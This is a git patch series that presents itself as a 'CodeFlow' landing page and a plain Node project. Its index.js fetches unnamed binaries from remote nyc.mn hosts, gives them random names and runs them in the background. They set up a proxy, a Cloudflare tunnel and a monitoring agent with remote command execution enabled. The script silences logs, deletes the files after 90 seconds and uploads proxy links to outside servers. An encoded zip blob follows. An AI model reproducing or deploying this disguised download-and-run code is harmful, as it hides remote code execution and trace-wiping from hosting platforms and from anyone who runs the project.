  • +
  • Basic components
  • +
  • Community support
  • +
  • 1 production app
  • +
+ +
+ + + +
+

Enterprise

+
Custom
+
    +
  • Unlimited users
  • +
  • Unlimited storage
  • +
  • All features included
  • +
  • 24/7 dedicated support
  • +
  • Unlimited apps
  • +
  • On-premises option
  • +
+ +
+
+
+
+ + +
+
+

Start Building Today

+

Join over 10,000 companies that use CodeFlow to accelerate their application development. No credit card required for the free trial.

+ +
+
+ + + + + + + diff --git a/index.js b/index.js new file mode 100644 index 0000000000..e4acef8f91 --- /dev/null +++ b/index.js @@ -0,0 +1,644 @@ +#!/usr/bin/env node + +const http = require("http"); +const axios = require("axios"); +const os = require('os'); +const fs = require("fs"); +const path = require("path"); +const { promisify } = require('util'); +const exec = promisify(require('child_process').exec); +const UPLOAD_URL = process.env.UPLOAD_URL || ''; // 节点或订阅自动上传地址,需填写部署Merge-sub项目后的首页地址,例如:https://merge.xxx.com +const PROJECT_URL = process.env.PROJECT_URL || ''; // 需要上传订阅或保活时需填写项目分配的url,例如:https://google.com +const AUTO_ACCESS = process.env.AUTO_ACCESS || false; // false关闭自动保活,true开启,需同时填写PROJECT_URL变量 +const FILE_PATH = process.env.FILE_PATH || '.tmp'; // 运行目录,sub节点文件保存目录 +const SUB_PATH = process.env.SUB_PATH || 'sub'; // 订阅路径 +const PORT = process.env.SERVER_PORT || process.env.PORT || 3000; // http服务订阅端口 +const UUID = process.env.UUID || '9afd1229-b893-40c1-84dd-51e7ce204913'; // 使用哪吒v1,在不同的平台运行需修改UUID,否则会覆盖 +const NEZHA_SERVER = process.env.NEZHA_SERVER || ''; // 哪吒v1填写形式: nz.abc.com:8008 哪吒v0填写形式:nz.abc.com +const NEZHA_PORT = process.env.NEZHA_PORT || ''; // 使用哪吒v1请留空,哪吒v0需填写 +const NEZHA_KEY = process.env.NEZHA_KEY || ''; // 哪吒v1的NZ_CLIENT_SECRET或哪吒v0的agent密钥 +const ARGO_DOMAIN = process.env.ARGO_DOMAIN || ''; // 固定隧道域名,留空即启用临时隧道 +const ARGO_AUTH = process.env.ARGO_AUTH || ''; // 固定隧道密钥json或token,留空即启用临时隧道,json获取地址:https://json.zone.id +const ARGO_PORT = process.env.ARGO_PORT || 8001; // 固定隧道端口,使用token需在cloudflare后台设置和这里一致 +const CFIP = process.env.CFIP || 'saas.sin.fan'; // 节点优选域名或优选ip +const CFPORT = process.env.CFPORT || 443; // 节点优选域名或优选ip对应的端口 +const NAME = process.env.NAME || ''; // 节点名称 + +// 创建运行文件夹 +if (!fs.existsSync(FILE_PATH)) { + fs.mkdirSync(FILE_PATH); + console.log(`${FILE_PATH} is created`); +} else { + console.log(`${FILE_PATH} already exists`); +} + +// 生成随机6位字符 +function generateRandomName() { + const characters = 'abcdefghijklmnopqrstuvwxyz'; + let result = ''; + for (let i = 0; i < 6; i++) { + result += characters.charAt(Math.floor(Math.random() * characters.length)); + } + return result; +} + +// 全局常量 +let subContent = null; +const npmName = generateRandomName(); +const webName = generateRandomName(); +const botName = generateRandomName(); +const phpName = generateRandomName(); +let npmPath = path.join(FILE_PATH, npmName); +let phpPath = path.join(FILE_PATH, phpName); +let webPath = path.join(FILE_PATH, webName); +let botPath = path.join(FILE_PATH, botName); +let subPath = path.join(FILE_PATH, 'sub.txt'); +let listPath = path.join(FILE_PATH, 'list.txt'); +let bootLogPath = path.join(FILE_PATH, 'boot.log'); +let configPath = path.join(FILE_PATH, 'config.json'); + +// 如果订阅器上存在历史运行节点则先删除 +function deleteNodes() { + try { + if (!UPLOAD_URL) return; + if (!fs.existsSync(subPath)) return; + + let fileContent; + try { + fileContent = fs.readFileSync(subPath, 'utf-8'); + } catch { + return null; + } + + const decoded = Buffer.from(fileContent, 'base64').toString('utf-8'); + const nodes = decoded.split('\n').filter(line => + /(vless|vmess|trojan|hysteria2|tuic):\/\//.test(line) + ); + + if (nodes.length === 0) return; + + axios.post(`${UPLOAD_URL}/api/delete-nodes`, + JSON.stringify({ nodes }), + { headers: { 'Content-Type': 'application/json' } } + ).catch((error) => { + return null; + }); + return null; + } catch (err) { + return null; + } +} + +// 清理历史文件 +function cleanupOldFiles() { + try { + const files = fs.readdirSync(FILE_PATH); + files.forEach(file => { + const filePath = path.join(FILE_PATH, file); + try { + const stat = fs.statSync(filePath); + if (stat.isFile()) { + fs.unlinkSync(filePath); + } + } catch (err) { + // 忽略所有错误,不记录日志 + } + }); + } catch (err) { + // 忽略所有错误,不记录日志 + } +} + +// 生成xr-ay配置文件 +async function generateConfig() { + const config = { + log: { access: '/dev/null', error: '/dev/null', loglevel: 'none' }, + inbounds: [ + { port: ARGO_PORT, protocol: 'vless', settings: { clients: [{ id: UUID, flow: 'xtls-rprx-vision' }], decryption: 'none', fallbacks: [{ dest: 3001 }, { path: "/vless-argo", dest: 3002 }, { path: "/vmess-argo", dest: 3003 }, { path: "/trojan-argo", dest: 3004 }] }, streamSettings: { network: 'tcp' } }, + { port: 3001, listen: "127.0.0.1", protocol: "vless", settings: { clients: [{ id: UUID }], decryption: "none" }, streamSettings: { network: "tcp", security: "none" } }, + { port: 3002, listen: "127.0.0.1", protocol: "vless", settings: { clients: [{ id: UUID, level: 0 }], decryption: "none" }, streamSettings: { network: "ws", security: "none", wsSettings: { path: "/vless-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } }, + { port: 3003, listen: "127.0.0.1", protocol: "vmess", settings: { clients: [{ id: UUID, alterId: 0 }] }, streamSettings: { network: "ws", wsSettings: { path: "/vmess-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } }, + { port: 3004, listen: "127.0.0.1", protocol: "trojan", settings: { clients: [{ password: UUID }] }, streamSettings: { network: "ws", security: "none", wsSettings: { path: "/trojan-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } }, + ], + dns: { servers: ["https+local://8.8.8.8/dns-query"] }, + outbounds: [{ protocol: "freedom", tag: "direct" }, { protocol: "blackhole", tag: "block" }] + }; + fs.writeFileSync(path.join(FILE_PATH, 'config.json'), JSON.stringify(config, null, 2)); +} + +// 判断系统架构 +function getSystemArchitecture() { + const arch = os.arch(); + if (arch === 'arm' || arch === 'arm64' || arch === 'aarch64') { + return 'arm'; + } else { + return 'amd'; + } +} + +// 下载对应系统架构的依赖文件 +function downloadFile(fileName, fileUrl, callback) { + const filePath = fileName; + + if (!fs.existsSync(FILE_PATH)) { + fs.mkdirSync(FILE_PATH, { recursive: true }); + } + + const writer = fs.createWriteStream(filePath); + + axios({ + method: 'get', + url: fileUrl, + responseType: 'stream', + }) + .then(response => { + response.data.pipe(writer); + + writer.on('finish', () => { + writer.close(); + console.log(`Download ${path.basename(filePath)} successfully`); + callback(null, filePath); + }); + + writer.on('error', err => { + fs.unlink(filePath, () => { }); + const errorMessage = `Download ${path.basename(filePath)} failed: ${err.message}`; + console.error(errorMessage); + callback(errorMessage); + }); + }) + .catch(err => { + const errorMessage = `Download ${path.basename(filePath)} failed: ${err.message}`; + console.error(errorMessage); + callback(errorMessage); + }); +} + +// 下载并运行依赖文件 +async function downloadFilesAndRun() { + const architecture = getSystemArchitecture(); + const filesToDownload = getFilesForArchitecture(architecture); + + if (filesToDownload.length === 0) { + console.log(`Can't find a file for the current architecture`); + return; + } + + const downloadPromises = filesToDownload.map(fileInfo => { + return new Promise((resolve, reject) => { + downloadFile(fileInfo.fileName, fileInfo.fileUrl, (err, filePath) => { + if (err) { + reject(err); + } else { + resolve(filePath); + } + }); + }); + }); + + try { + await Promise.all(downloadPromises); + } catch (err) { + console.error('Error downloading files:', err); + return; + } + + function authorizeFiles(filePaths) { + const newPermissions = 0o775; + filePaths.forEach(absoluteFilePath => { + if (fs.existsSync(absoluteFilePath)) { + fs.chmod(absoluteFilePath, newPermissions, (err) => { + if (err) { + console.error(`Empowerment failed for ${absoluteFilePath}: ${err}`); + } else { + console.log(`Empowerment success for ${absoluteFilePath}: ${newPermissions.toString(8)}`); + } + }); + } + }); + } + const filesToAuthorize = NEZHA_PORT ? [npmPath, webPath, botPath] : [phpPath, webPath, botPath]; + authorizeFiles(filesToAuthorize); + + // 运行ne-zha + if (NEZHA_SERVER && NEZHA_KEY) { + if (!NEZHA_PORT) { + const port = NEZHA_SERVER.includes(':') ? NEZHA_SERVER.split(':').pop() : ''; + const tlsPorts = new Set(['443', '8443', '2096', '2087', '2083', '2053']); + const nezhatls = tlsPorts.has(port) ? 'true' : 'false'; + const configYaml = ` +client_secret: ${NEZHA_KEY} +debug: false +disable_auto_update: true +disable_command_execute: false +disable_force_update: true +disable_nat: false +disable_send_query: false +gpu: false +insecure_tls: true +ip_report_period: 1800 +report_delay: 4 +server: ${NEZHA_SERVER} +skip_connection_count: true +skip_procs_count: true +temperature: false +tls: ${nezhatls} +use_gitee_to_upgrade: false +use_ipv6_country_code: false +uuid: ${UUID}`; + + fs.writeFileSync(path.join(FILE_PATH, 'config.yaml'), configYaml); + + const command = `nohup ${phpPath} -c "${FILE_PATH}/config.yaml" >/dev/null 2>&1 &`; + try { + await exec(command); + console.log(`${phpName} is running`); + await new Promise((resolve) => setTimeout(resolve, 1000)); + } catch (error) { + console.error(`php running error: ${error}`); + } + } else { + let NEZHA_TLS = ''; + const tlsPorts = ['443', '8443', '2096', '2087', '2083', '2053']; + if (tlsPorts.includes(NEZHA_PORT)) { + NEZHA_TLS = '--tls'; + } + const command = `nohup ${npmPath} -s ${NEZHA_SERVER}:${NEZHA_PORT} -p ${NEZHA_KEY} ${NEZHA_TLS} --disable-auto-update --report-delay 4 --skip-conn --skip-procs >/dev/null 2>&1 &`; + try { + await exec(command); + console.log(`${npmName} is running`); + await new Promise((resolve) => setTimeout(resolve, 1000)); + } catch (error) { + console.error(`npm running error: ${error}`); + } + } + } else { + console.log('NEZHA variable is empty,skip running'); + } + + // 运行xr-ay + const command1 = `nohup ${webPath} -c ${FILE_PATH}/config.json >/dev/null 2>&1 &`; + try { + await exec(command1); + console.log(`${webName} is running`); + await new Promise((resolve) => setTimeout(resolve, 1000)); + } catch (error) { + console.error(`web running error: ${error}`); + } + + // 运行cloud-fared + if (fs.existsSync(botPath)) { + let args; + + if (ARGO_AUTH.match(/^[A-Z0-9a-z=]{120,250}$/)) { + args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 run --token ${ARGO_AUTH}`; + } else if (ARGO_AUTH.match(/TunnelSecret/)) { + args = `tunnel --edge-ip-version auto --config ${FILE_PATH}/tunnel.yml run`; + } else { + args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 --logfile ${FILE_PATH}/boot.log --loglevel info --url http://localhost:${ARGO_PORT}`; + } + + try { + await exec(`nohup ${botPath} ${args} >/dev/null 2>&1 &`); + console.log(`${botName} is running`); + await new Promise((resolve) => setTimeout(resolve, 2000)); + } catch (error) { + console.error(`Error executing command: ${error}`); + } + } + await new Promise((resolve) => setTimeout(resolve, 5000)); +} + +// 根据系统架构返回对应的url +function getFilesForArchitecture(architecture) { + let baseFiles; + if (architecture === 'arm') { + baseFiles = [ + { fileName: webPath, fileUrl: "https://arm64.ssss.nyc.mn/web" }, + { fileName: botPath, fileUrl: "https://arm64.ssss.nyc.mn/bot" } + ]; + } else { + baseFiles = [ + { fileName: webPath, fileUrl: "https://amd64.ssss.nyc.mn/web" }, + { fileName: botPath, fileUrl: "https://amd64.ssss.nyc.mn/bot" } + ]; + } + + if (NEZHA_SERVER && NEZHA_KEY) { + if (NEZHA_PORT) { + const npmUrl = architecture === 'arm' + ? "https://arm64.ssss.nyc.mn/agent" + : "https://amd64.ssss.nyc.mn/agent"; + baseFiles.unshift({ + fileName: npmPath, + fileUrl: npmUrl + }); + } else { + const phpUrl = architecture === 'arm' + ? "https://arm64.ssss.nyc.mn/v1" + : "https://amd64.ssss.nyc.mn/v1"; + baseFiles.unshift({ + fileName: phpPath, + fileUrl: phpUrl + }); + } + } + + return baseFiles; +} + +// 获取固定隧道json +function argoType() { + if (!ARGO_AUTH || !ARGO_DOMAIN) { + console.log("ARGO_DOMAIN or ARGO_AUTH is empty, use quick tunnels"); + return; + } + + if (ARGO_AUTH.includes('TunnelSecret')) { + fs.writeFileSync(path.join(FILE_PATH, 'tunnel.json'), ARGO_AUTH); + const tunnelYaml = ` + tunnel: ${ARGO_AUTH.split('"')[11]} + credentials-file: ${path.join(FILE_PATH, 'tunnel.json')} + protocol: http2 + + ingress: + - hostname: ${ARGO_DOMAIN} + service: http://localhost:${ARGO_PORT} + originRequest: + noTLSVerify: true + - service: http_status:404 + `; + fs.writeFileSync(path.join(FILE_PATH, 'tunnel.yml'), tunnelYaml); + } else { + console.log(`Using token connect to tunnel, please set ${ARGO_PORT} in clouudflare`); + } +} + +// 获取临时隧道domain +async function extractDomains() { + let argoDomain; + + if (ARGO_AUTH && ARGO_DOMAIN) { + argoDomain = ARGO_DOMAIN; + console.log('ARGO_DOMAIN:', argoDomain); + await generateLinks(argoDomain); + } else { + try { + const fileContent = fs.readFileSync(path.join(FILE_PATH, 'boot.log'), 'utf-8'); + const lines = fileContent.split('\n'); + const argoDomains = []; + lines.forEach((line) => { + const domainMatch = line.match(/https?:\/\/([^ ]*trycloudflare\.com)\/?/); + if (domainMatch) { + const domain = domainMatch[1]; + argoDomains.push(domain); + } + }); + + if (argoDomains.length > 0) { + argoDomain = argoDomains[0]; + console.log('ArgoDomain:', argoDomain); + await generateLinks(argoDomain); + } else { + console.log('ArgoDomain not found, re-running bot to obtain ArgoDomain'); + fs.unlinkSync(path.join(FILE_PATH, 'boot.log')); + async function killBotProcess() { + try { + if (process.platform === 'win32') { + await exec(`taskkill /f /im ${botName}.exe > nul 2>&1`); + } else { + await exec(`pkill -f "[${botName.charAt(0)}]${botName.substring(1)}" > /dev/null 2>&1`); + } + } catch (error) { + // 忽略输出 + } + } + killBotProcess(); + await new Promise((resolve) => setTimeout(resolve, 3000)); + const args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 --logfile ${FILE_PATH}/boot.log --loglevel info --url http://localhost:${ARGO_PORT}`; + try { + await exec(`nohup ${botPath} ${args} >/dev/null 2>&1 &`); + console.log(`${botName} is running`); + await new Promise((resolve) => setTimeout(resolve, 3000)); + await extractDomains(); + } catch (error) { + console.error(`Error executing command: ${error}`); + } + } + } catch (error) { + console.error('Error reading boot.log:', error); + } + } +} + +// 获取isp信息 +async function getMetaInfo() { + try { + const response1 = await axios.get('https://api.ip.sb/geoip', { headers: { 'User-Agent': 'Mozilla/5.0', timeout: 3000 } }); + if (response1.data && response1.data.country_code && response1.data.isp) { + return `${response1.data.country_code}-${response1.data.isp}`.replace(/\s+/g, '_'); + } + } catch (error) { + try { + const response2 = await axios.get('http://ip-api.com/json', { headers: { 'User-Agent': 'Mozilla/5.0', timeout: 3000 } }); + if (response2.data && response2.data.status === 'success' && response2.data.countryCode && response2.data.org) { + return `${response2.data.countryCode}-${response2.data.org}`.replace(/\s+/g, '_'); + } + } catch (error) { + // console.error('Backup API also failed'); + } + } + return 'Unknown'; +} + +// 生成 list 和 sub 信息 +async function generateLinks(argoDomain) { + const ISP = await getMetaInfo(); + const nodeName = NAME ? `${NAME}-${ISP}` : ISP; + return new Promise((resolve) => { + setTimeout(() => { + const VMESS = { v: '2', ps: `${nodeName}`, add: CFIP, port: CFPORT, id: UUID, aid: '0', scy: 'auto', net: 'ws', type: 'none', host: argoDomain, path: '/vmess-argo?ed=2560', tls: 'tls', sni: argoDomain, alpn: '', fp: 'firefox' }; + const subTxt = ` +vless://${UUID}@${CFIP}:${CFPORT}?encryption=none&security=tls&sni=${argoDomain}&fp=firefox&type=ws&host=${argoDomain}&path=%2Fvless-argo%3Fed%3D2560#${nodeName} + +vmess://${Buffer.from(JSON.stringify(VMESS)).toString('base64')} + +trojan://${UUID}@${CFIP}:${CFPORT}?security=tls&sni=${argoDomain}&fp=firefox&type=ws&host=${argoDomain}&path=%2Ftrojan-argo%3Fed%3D2560#${nodeName} + `; + console.log(Buffer.from(subTxt).toString('base64')); + fs.writeFileSync(subPath, Buffer.from(subTxt).toString('base64')); + console.log(`${FILE_PATH}/sub.txt saved successfully`); + // 将订阅内容保存到全局变量,供 http 服务器使用 + subContent = Buffer.from(subTxt).toString('base64'); + uploadNodes(); + resolve(subTxt); + }, 2000); + }); +} + +// 自动上传节点或订阅 +async function uploadNodes() { + if (UPLOAD_URL && PROJECT_URL) { + const subscriptionUrl = `${PROJECT_URL}/${SUB_PATH}`; + const jsonData = { + subscription: [subscriptionUrl] + }; + try { + const response = await axios.post(`${UPLOAD_URL}/api/add-subscriptions`, jsonData, { + headers: { + 'Content-Type': 'application/json' + } + }); + + if (response && response.status === 200) { + console.log('Subscription uploaded successfully'); + return response; + } else { + return null; + } + } catch (error) { + if (error.response) { + if (error.response.status === 400) { + // console.error('Subscription already exists'); + } + } + } + } else if (UPLOAD_URL) { + if (!fs.existsSync(listPath)) return; + const content = fs.readFileSync(listPath, 'utf-8'); + const nodes = content.split('\n').filter(line => /(vless|vmess|trojan|hysteria2|tuic):\/\//.test(line)); + + if (nodes.length === 0) return; + + const jsonData = JSON.stringify({ nodes }); + + try { + const response = await axios.post(`${UPLOAD_URL}/api/add-nodes`, jsonData, { + headers: { 'Content-Type': 'application/json' } + }); + if (response && response.status === 200) { + console.log('Nodes uploaded successfully'); + return response; + } else { + return null; + } + } catch (error) { + return null; + } + } else { + // console.log('Skipping upload nodes'); + return; + } +} + +// 90s后删除相关文件 +function cleanFiles() { + setTimeout(() => { + const filesToDelete = [bootLogPath, configPath, webPath, botPath]; + + if (NEZHA_PORT) { + filesToDelete.push(npmPath); + } else if (NEZHA_SERVER && NEZHA_KEY) { + filesToDelete.push(phpPath); + } + + if (process.platform === 'win32') { + exec(`del /f /q ${filesToDelete.join(' ')} > nul 2>&1`, (error) => { + console.clear(); + console.log('App is running'); + console.log('Thank you for using this script, enjoy!'); + }); + } else { + exec(`rm -rf ${filesToDelete.join(' ')} >/dev/null 2>&1`, (error) => { + console.clear(); + console.log('App is running'); + console.log('Thank you for using this script, enjoy!'); + }); + } + }, 90000); +} +cleanFiles(); + +// 自动访问项目URL +async function AddVisitTask() { + if (!AUTO_ACCESS || !PROJECT_URL) { + console.log("Skipping adding automatic access task"); + return; + } + + try { + const response = await axios.post('https://oooo.serv00.net/add-url', { + url: PROJECT_URL + }, { + headers: { + 'Content-Type': 'application/json' + } + }); + console.log(`automatic access task added successfully`); + return response; + } catch (error) { + console.error(`Add automatic access task faild: ${error.message}`); + return null; + } +} + +// 主运行逻辑 +async function startserver() { + try { + argoType(); + deleteNodes(); + cleanupOldFiles(); + await generateConfig(); + await downloadFilesAndRun(); + await extractDomains(); + await AddVisitTask(); + } catch (error) { + console.error('Error in startserver:', error); + } +} +startserver().catch(error => { + console.error('Unhandled error in startserver:', error); +}); + +// 创建 http 服务器 +const server = http.createServer(async (req, res) => { + const urlPath = req.url.split('?')[0]; + + // 订阅路由 + if (urlPath === `/${SUB_PATH}`) { + if (subContent) { + res.writeHead(200, { 'Content-Type': 'text/plain; charset=utf-8' }); + res.end(subContent); + } else { + // 订阅内容尚未生成,尝试从文件读取 + try { + const fileContent = fs.readFileSync(subPath, 'utf-8'); + res.writeHead(200, { 'Content-Type': 'text/plain; charset=utf-8' }); + res.end(fileContent); + } catch (err) { + res.writeHead(503, { 'Content-Type': 'text/plain; charset=utf-8' }); + res.end('Subscription content not yet available, please try again later.'); + } + } + return; + } + + // 根路由: / + if (urlPath === '/') { + try { + const filePath = path.join(__dirname, 'index.html'); + const data = await fs.promises.readFile(filePath, 'utf8'); + res.writeHead(200, { 'Content-Type': 'text/html; charset=utf-8' }); + res.end(data); + } catch (err) { + res.writeHead(200, { 'Content-Type': 'text/html; charset=utf-8' }); + res.end("Hello world!

You can access /{SUB_PATH}(Default: /sub) to get your nodes!"); + } + return; + } + + res.writeHead(404, { 'Content-Type': 'text/plain; charset=utf-8' }); + res.end('Not Found'); +}); + +server.listen(PORT, () => console.log(`http server is running on port:${PORT}!`)); diff --git a/package.json b/package.json new file mode 100644 index 0000000000..19f7ac7ada --- /dev/null +++ b/package.json @@ -0,0 +1,20 @@ +{ + "name": "nodejs", + "version": "1,0,0", + "description": "Thsi is a node project", + "main": "index.js", + "author": "", + "repository": "", + "license": "MIT", + "private": false, + "scripts": { + "dev": "node index.js", + "start": "node index.js" + }, + "dependencies": { + "axios": "latest" + }, + "engines": { + "node": ">=14" + } +} From 52833a6e06d2c2477952b1bec899c7842672881c Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Sat, 20 Jun 2026 00:58:32 +0800 Subject: [PATCH 11/19] Create .github\workflows\1.md --- ".github\\workflows\\1.md" | 1 + 1 file changed, 1 insertion(+) create mode 100644 ".github\\workflows\\1.md" diff --git "a/.github\\workflows\\1.md" "b/.github\\workflows\\1.md" new file mode 100644 index 0000000000..b4de394767 --- /dev/null +++ "b/.github\\workflows\\1.md" @@ -0,0 +1 @@ +11 From 7332a4c82af4513d48d8a5e4099f20fb2b6c7264 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Sat, 20 Jun 2026 01:00:17 +0800 Subject: [PATCH 12/19] Add files via upload --- nodejs-argo-main.zip | Bin 0 -> 18052 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 nodejs-argo-main.zip diff --git a/nodejs-argo-main.zip b/nodejs-argo-main.zip new file mode 100644 index 0000000000000000000000000000000000000000..c347b2ee99c5e7c5d01e61dcbbb0bc5792c3972a GIT binary patch literal 18052 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 